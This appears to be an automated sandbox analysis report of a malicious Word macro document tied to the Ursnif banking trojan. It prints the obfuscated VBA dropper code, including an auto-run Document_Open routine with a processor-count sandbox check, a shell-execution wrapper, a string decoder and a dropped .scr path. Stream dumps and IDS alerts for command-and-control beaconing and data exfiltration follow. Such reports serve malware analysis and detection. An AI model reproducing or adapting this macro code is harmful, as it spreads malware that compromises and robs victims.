L5af6 = "OSb7k"

Dim PXqeM(16) As Byte

PXqeM(16) = 100

Dim Ii745 As String

Ii745 = A35Ls

Dim ZmoPt As Byte

Dim JpmGb(10 To 74) As String

JpmGb(10) = "MJId0"

Dim YkN4C(9 To 421) As Long

YkN4C(9) = (800 - 56) + 7

Dim K58bD(18 To 66) As Long

K58bD(18) = (-554 + 920) + 17

Dim Qktd2 As Long

Qktd2 = (338 - 233) - 14

Dim Gs8t8 As String

Gs8t8 = N578T

Open B78Bz For Binary As #19

Dim Uqt4K(18 To 483) As Long

Uqt4K(18) = (-535 + 962) + 35

Dim HL8B8(40) As Byte

HL8B8(40) = 163

Dim FH3aW As String

FH3aW = U3038

Dim Pz62B(59) As Byte

Pz62B(59) = 168

Dim S303u(92) As Byte

S303u(92) = 61

Dim NW5wB As Long

NW5wB = (279 / 633) + 28

Dim Pp7vm(79) As Byte

Pp7vm(79) = 12

Dim D20d3 As Byte

D20d3 = 212

Dim SE0jN As String

SE0jN = "FPLi6"

Dim T86QH(2 To 75) As String

T86QH(2) = Y0SFj

Dim XSppB As Long

XSppB = (667 / 48) + 4

Put #19, , RTkJ0

Dim Mf17B(31 To 159) As Long

Mf17B(31) = (349 - 920) + 18

Dim AyHq1(27 To 332) As Long

AyHq1(27) = (-390 + 749) + 19

Dim N6L1O As Long

N6L1O = (-764 + 116) + 7

Dim JAYs7 As Byte

JAYs7 = 216

Dim P1h2Y(25 To 237) As String

P1h2Y(25) = EqDjd

Dim X1z36(43) As Byte

X1z36(43) = 200

Dim A4n88 As Long

A4n88 = (-354 / 296) + 42

Dim UbRVW As Long

UbRVW = (-535 / 642) / 32

Dim TU6xB As Long

TU6xB = (-708 - 917) + 16

Dim K48Z4 As Byte

Dim EdHSW(7 To 484) As String

EdHSW(7) = "DX0mh"

Dim TeAB3 As Long

TeAB3 = (1 - 500) + 34

Close #19

Dim J1Wo3 As String

J1Wo3 = "U0xEV"

Dim VF16a As String

VF16a = "S6WCJ"

Dim WcTgf As Long

WcTgf = (768 / 466) - 7

Dim JmG7I As String

JmG7I = "R21L5"

Dim J0t0N As Long

J0t0N = (-891 / 842) / 5

Dim Mu8NH(86) As Byte

Mu8NH(86) = 250

Dim QA4Mr(7 To 148) As Long

QA4Mr(7) = (503 + 327) + 6

Dim C0PZL As Long

C0PZL = (-388 + 134) + 30

Dim HrrCc(91) As Byte

HrrCc(91) = 57

Dim Hk0V0 As Long

Hk0V0 = (713 + 996) / 2

Dim Rb1h8 As Byte

Rb1h8 = 112

Dim U617W(12 To 96) As String

U617W(12) = J6Xnm

Dim ZRCcY(30 To 393) As String

ZRCcY(30) = Gn0p5

Dim P6yT0(59) As Byte

P6yT0(59) = 81

Dim YQZp0(66) As Byte

YQZp0(66) = 53

Dim Sa4Q0(0) As Byte

Sa4Q0(0) = 65

Dim WYHVk(1 To 106) As String

WYHVk(1) = "PGn02"

Dim Igsio(10 To 56) As String

Igsio(10) = "V20A1"

End With

Dim TY3vv As Long

TY3vv = (-297 + 744) + 33

Dim RtUn3 As String

RtUn3 = X6RIx

Dim HT1LE(48) As Byte

HT1LE(48) = 60

Dim Kg17y(11) As Byte

Kg17y(11) = 227

Dim T6AE8 As Long

T6AE8 = (-907 - 367) - 32

Dim D6KKC As Byte

Dim TOe3b As String

TOe3b = "CtDSH"

Dim BIXuv As Byte

BIXuv = 20

Dim DHJ31(10) As Byte

DHJ31(10) = 98

Dim A7OP0 As String

A7OP0 = TyTNz

Dim D2WGt(28 To 97) As Long

D2WGt(28) = (876 + 476) - 31

Dim URDqO(11 To 381) As Long

URDqO(11) = (103 - 251) - 31

Dim ZQQNT As Long

ZQQNT = (-941 + 373) + 30

Dim U60S8 As Long

U60S8 = (-290 + 803) + 20

Dim IVOcx As Byte

IVOcx = 200

Dim RmOJE(9 To 201) As String

RmOJE(9) = "Qgym7"

Dim C1E75(10 To 44) As String

C1E75(10) = "Gt7oe"

Dim UQkcM(91) As Byte

UQkcM(91) = 217

Dim Q2z35 As Byte

Q2z35 = 177

End Sub

Public Sub sh1(F00qU)

Dim Ptc5o(13 To 200) As String

Ptc5o(13) = H0M0p

Dim ZaG8G(8 To 99) As Long

ZaG8G(8) = (162 + 318) - 21

Dim I5ig6(14 To 381) As String

I5ig6(14) = "XGe3h"

Dim Bpabn As String

Bpabn = "M8V15"

Dim DAF72 As String

DAF72 = "LBfNF"

Dim TKO2N As Long

TKO2N = (-315 + 418) - 5

Dim L587f As Long

L587f = (-185 - 760) - 7

Dim AAec6(34 To 341) As String

AAec6(34) = Kh1g3

Dim Nm0Yv As Long

Nm0Yv = (415 - 106) + 43

Dim G6l8T(19 To 438) As String

G6l8T(19) = "B0v6X"

Dim LTFyB As Long

LTFyB = (-448 + 490) + 36

Dim JQ6ao(16 To 331) As String

JQ6ao(16) = W4t1q

Dim T61ct(58) As Byte

T61ct(58) = 198

Dim ToH5N(9 To 217) As Long

ToH5N(9) = (670 - 498) / 32

Dim H65i1 As String

H65i1 = "M3wGt"

Dim Ulb3r(30 To 474) As Long

Ulb3r(30) = (886 + 165) + 27

Dim FTHZk(6 To 474) As String

FTHZk(6) = K1jv6

Dim X1MrK As Byte

Dim OOI2e As Long

OOI2e = (958 + 425) - 45

Dim I10aL(28 To 158) As Long

I10aL(28) = (256 / 317) + 4

Dim Md7Q6(26 To 100) As String

Md7Q6(26) = "Qpo3B"

Dim DtE35(25 To 292) As String

DtE35(25) = W10rU

Dim BCl86(56) As Byte

BCl86(56) = 171

Dim S3G1Z As Byte

S3G1Z = 88

Dim Vp54V(31 To 165) As String

Vp54V(31) = WK0I3

Dim XVX82 As String

XVX82 = "VL6YB"

Shell F00qU

Dim TaG5l(36) As Byte

TaG5l(36) = 225

Dim BB7L8(5 To 168) As Long

BB7L8(5) = (-165 / 193) + 26

Dim Lf1pz As Byte

Lf1pz = 76

Dim Z7x5a(28 To 292) As Long

Z7x5a(28) = (-248 / 732) + 46

Dim XgI18 As Long

XgI18 = (778 - 317) + 27

Dim F4HU2(84) As Byte

F4HU2(84) = 113

Dim PgKgC(5) As Byte

PgKgC(5) = 166

Dim APvq3(20) As Byte

APvq3(20) = 139

Dim T8sNm(2 To 86) As Long

T8sNm(2) = (-843 + 294) + 10

Dim H0KD2 As Long

H0KD2 = (664 / 688) - 11

Dim N2PIL As String

N2PIL = Yi5qQ

Dim Q37jQ As Byte

Q37jQ = 252

Dim Rrp7P As String

Rrp7P = Td518

Dim Y27e5(28 To 130) As Long

Y27e5(28) = (823 / 937) - 47

Dim QsI7W(66) As Byte

QsI7W(66) = 100

Dim Zy4bG(43) As Byte

Zy4bG(43) = 218

Dim Tg68A As Byte

Tg68A = 121

Dim I4ysJ As String

I4ysJ = G4mfw

Dim EKeB4(11 To 332) As Long

EKeB4(11) = (44 - 194) + 49

End Sub

Sub Document_Open()

Dim UlBiv As String

UlBiv = T8F4v

Dim MQ7hW(29 To 194) As String

MQ7hW(29) = K5D8g

Dim QPyeV As String

QPyeV = Ul5qZ

Dim F63XK As String

F63XK = S28K3

Dim Fy83h(26 To 265) As Long

Fy83h(26) = (-385 - 366) - 24

Dim C7kr8 As Long

C7kr8 = (12 - 60) + 6

On Error Resume Next

If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 Then GoTo B0476

Dim D6q0Q(25 To 133) As Long

D6q0Q(25) = (-956 / 332) + 41

Dim JJzIB As Long

JJzIB = (-213 + 168) / 38

Dim OMLpT As Long

OMLpT = (574 / 575) / 44

Dim KRfkL As String

KRfkL = "Z265E"

Dim W8NN6 As String

W8NN6 = BJ05P

Dim ZOC5l As Long

ZOC5l = (-453 + 969) / 17

Dim VIfVd(23 To 219) As String

VIfVd(23) = P42zB

Dim JinL2 As Byte

Dim G2c48 As String

G2c48 = "WE3yt"

Dim VZLVx As Byte

VZLVx = 165

Dim M17C2(25 To 322) As String

M17C2(25) = Q27gI

Dim FPN8c As Long

FPN8c = (236 / 794) - 26

x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"

Dim Xw24M As Byte

Xw24M = 254

Dim PqAkQ As Byte

B0476:

End Sub
                    VBA File Name: U2YLn.bas, Stream Size: 4651
                    General
                    Stream Path:VBA/U2YLn
                    VBA File Name:U2YLn.bas
                    Stream Size:4651
                    Data ASCII:. . . . . . . . . l . . . . . . . . . . . . . . . s . . . . . . . . . . . . . . . . 8 R Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 01 00 00 f0 00 00 00 6c 07 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 73 07 00 00 ab 0e 00 00 00 00 00 00 01 00 00 00 e8 38 52 51 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    OCkrm
                    Optional
                    randcif)
                    Attribute
                    VNkBN
                    String
                    VB_Name
                    RuFGf
                    Function
                    HsaCb
                    YVBUd
                    VBA Code
                    Attribute VB_Name = "U2YLn"

Function BjOEsxO3(Optional Wez36, Optional randcif)

Dim YVBUd As Byte

Dim K1txh(70) As Byte

K1txh(70) = 153

Dim K1oFf As String

K1oFf = "GYv57"

Dim P0K85 As Long

P0K85 = (236 - 686) / 2

Dim QDKu7(40) As Byte

QDKu7(40) = 95

Dim QHCci(15 To 388) As Long

QHCci(15) = (993 / 320) / 33

Dim XJLMD(97) As Byte

XJLMD(97) = 14

Dim LzTI8(33) As Byte

LzTI8(33) = 56

Dim W376U(2 To 177) As String

W376U(2) = OCkrm

Dim CkF05 As Long

CkF05 = (-294 + 834) / 2

Dim I365r(34) As Byte

I365r(34) = 119

Dim OFNUb(94) As Byte

OFNUb(94) = 106

Dim FyNWs(15 To 422) As String

FyNWs(15) = AST0b

Dim Ad61u As String

Ad61u = "V7I6P"

Dim M8yYX(6 To 242) As Long

M8yYX(6) = (-686 - 221) / 49

Dim VSA4C As Byte

Dim NQ7c1 As Long

NQ7c1 = (-813 / 193) + 36

Dim UTudO(95) As Byte

UTudO(95) = 224

Dim YW2oS(33 To 216) As Long

YW2oS(33) = (388 / 946) - 46

Dim Y7a3h(22 To 308) As Long

Y7a3h(22) = (-268 + 837) - 9

Dim B8atH As String

B8atH = ZYu1R

Dim CKC1u(23 To 217) As Long

CKC1u(23) = (215 + 644) - 47

Dim VNkBN As String

VNkBN = HsaCb

For i = 1 To Len(Wez36)

Dim ToR08 As String

ToR08 = BbA1x

K1AJP = K1AJP + Chr(Asc(Mid(Wez36, i, 1)) - 3)

Dim RB48x(59) As Byte

RB48x(59) = 202

Dim RuFGf As Long

RuFGf = (163 - 66) + 10

Next

Dim Qu53J As Byte

Qu53J = 0

Dim AX212 As String

AX212 = OjKf2

BjOEsxO3 = K1AJP

Dim QFj46(93) As Byte

QFj46(93) = 12

Dim Y8FMQ As Byte

Y8FMQ = 8

End Function

                    Streams

                    Stream Path: LKfy2/\x1CompObj, File Type: data, Stream Size: 97
                    General
                    Stream Path:LKfy2/\x1CompObj
                    File Type:data
                    Stream Size:97
                    Entropy:3.61064918306
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    Stream Path: LKfy2/\x3VBFrame, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 261
                    General
                    Stream Path:LKfy2/\x3VBFrame
                    File Type:ASCII text, with CRLF, CR line terminators
                    Stream Size:261
                    Entropy:4.63124393053
                    Base64 Encoded:True
                    Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } L K f y 2 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 2 0 6 0 . . C l i e n t L e f t = 3 0 . . C l i e n t T o p = 3 1 0 . . C l i e n t W i d t h = 3 1 4 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n e r . .
                    Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 4c 4b 66 79 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 20 20 32 30
                    Stream Path: LKfy2/f, File Type: data, Stream Size: 38
                    General
                    Stream Path:LKfy2/f
                    File Type:data
                    Stream Size:38
                    Entropy:1.54052096453
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . } . . . . . . 2 . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 a3 15 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Stream Path: LKfy2/o, File Type: empty, Stream Size: 0
                    General
                    Stream Path:LKfy2/o
                    File Type:empty
                    Stream Size:0
                    Entropy:0.0
                    Base64 Encoded:False
                    Data ASCII:
                    Data Raw:
                    Stream Path: PROJECT, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 644
                    General
                    Stream Path:PROJECT
                    File Type:ASCII text, with CRLF, CR line terminators
                    Stream Size:644
                    Entropy:5.40333870486
                    Base64 Encoded:True
                    Data ASCII:I D = " { D 1 2 B C 7 0 C - 0 4 8 F - 4 B B D - B 8 C 7 - 0 F 2 B 9 5 C 6 7 E C F } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . M o d u l e = J 0 4 X t . . M o d u l e = J t u J u . . M o d u l e = U 2 Y L n . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = L K f y 2 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2
                    Data Raw:49 44 3d 22 7b 44 31 32 42 43 37 30 43 2d 30 34 38 46 2d 34 42 42 44 2d 42 38 43 37 2d 30 46 32 42 39 35 43 36 37 45 43 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4d 6f 64 75 6c 65 3d 4a 30 34 58 74 0d 0a 4d 6f 64 75 6c 65 3d 4a 74 75 4a 75 0d 0a 4d 6f 64 75 6c
                    Stream Path: PROJECTwm, File Type: data, Stream Size: 137
                    General
                    Stream Path:PROJECTwm
                    File Type:data
                    Stream Size:137
                    Entropy:3.5936854412
                    Base64 Encoded:False
                    Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . J 0 4 X t . J . 0 . 4 . X . t . . . J t u J u . J . t . u . J . u . . . U 2 Y L n . U . 2 . Y . L . n . . . L K f y 2 . L . K . f . y . 2 . . . . .
                    Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 4a 30 34 58 74 00 4a 00 30 00 34 00 58 00 74 00 00 00 4a 74 75 4a 75 00 4a 00 74 00 75 00 4a 00 75 00 00 00 55 32 59 4c 6e 00 55 00 32 00 59 00 4c 00 6e 00 00 00 4c 4b 66 79 32 00 4c 00 4b 00 66
                    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 22170
                    General
                    Stream Path:VBA/_VBA_PROJECT
                    File Type:data
                    Stream Size:22170
                    Entropy:5.33944479619
                    Base64 Encoded:True
                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 08 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                    Stream Path: VBA/dir, File Type: data, Stream Size: 1195
                    General
                    Stream Path:VBA/dir
                    File Type:data
                    Stream Size:1195
                    Entropy:6.66385277748
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . r ^ . . . . J . < . . . . . r s t d o l e > . . . s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . E N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . r .
                    Data Raw:01 a7 b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 d3 95 72 5e ce 1c 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 20 6f 6c 65 3e 00 01 19 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    03/20/19-16:39:00.572242TCP2021813ET TROJAN Ursnif Variant CnC Beacon4920680192.168.1.8337.152.176.90
                    03/20/19-16:39:11.897364TCP2021830ET TROJAN Ursnif Variant CnC Data Exfil4920780192.168.1.8346.139.176.151

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Mr 20, 2019 16:37:49.634068012 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.666841030 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.666996956 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.667716980 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.699666023 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.700239897 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.700280905 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.700310946 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.700342894 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.700371027 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.700388908 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.700398922 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.700427055 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.700454950 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.700480938 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.700542927 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.700634003 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.709187984 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.732690096 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.732732058 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.732758999 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.732793093 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.733881950 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.733912945 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.733942032 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.733971119 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.733997107 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.734024048 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.734061956 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.734100103 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.734127045 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.734153986 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.734179974 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.734205961 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.734231949 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.734257936 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.734322071 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.734348059 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.736907959 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.740381002 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.769077063 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769124031 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769160986 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769192934 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769223928 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769237041 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.769268036 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769292116 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769305944 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769332886 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769359112 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769368887 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.769386053 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769412994 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769440889 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769468069 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769495964 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769500971 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.769525051 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769548893 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769575119 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.769593954 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.769602060 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.772614956 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.772685051 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.772727013 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.772756100 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.772779942 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.772799015 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.772838116 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.772861004 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.772901058 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.772927999 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.772943020 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.772979021 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773000002 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773021936 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773034096 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.773045063 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773067951 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773088932 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773113966 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773135900 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773150921 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.773156881 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773179054 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773200989 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773224115 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.773260117 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.775572062 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.801768064 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.801811934 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.801975012 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.816412926 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.848565102 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848604918 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848620892 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848634958 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848649979 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848664999 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848681927 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848700047 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848715067 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848731995 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848747969 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848803997 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848822117 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.848846912 MEZ4920480192.168.1.8331.148.219.163
